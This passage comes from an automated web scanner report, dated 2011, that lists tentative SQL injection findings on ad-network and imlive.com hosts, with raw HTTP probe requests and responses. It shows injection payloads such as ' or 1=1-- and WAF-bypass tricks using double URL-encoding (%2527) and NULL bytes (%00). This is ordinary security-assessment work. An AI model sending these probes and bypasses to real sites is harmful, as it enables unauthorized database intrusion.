Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: b=%3A%3Apogj; Domain=.adbrite.com; Expires=Sun, 29-Jan-2012 01:56:25 GMT; Path=/
Set-Cookie: geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; Domain=.adbrite.com; Expires=Sat, 05-Feb-2011 01:56:25 GMT; Path=/
Set-Cookie: vsd="0@1@4d4373c9@d3.zedo.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:25 GMT
Connection: close
Content-Length: 376

document.writeln("<script language=\"JavaScript\">");
document.writeln("var zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zflag_sz=
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/st.php%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php%2527%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 218
Keep-Alive: timeout=120, max=893
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php%27%27 was not found on this server.</
...[SNIP]...

1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adscgen/st.php/1%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/st.php/1%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 214
Keep-Alive: timeout=120, max=888
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/st.php/1 was not found on this server.</p>
<
...[SNIP]...

1.8. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static'%20and%201%3d1--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=1-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static'%20and%201%3d2--%20/rtb/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static' and 1=2-- /rtb/sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

1.9. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 32712709'%20or%201%3d1--%20 and 32712709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html32712709'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html32712709'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 28 Jan 2011 16:44:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html32712709' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.10. http://cafr.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 8336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.11. http://de.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8237
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.12. http://es.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8230
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.13. http://fr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 8249
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.14. http://gr.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:34 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:35 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.15. http://ib.adnxs.com/getuid [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
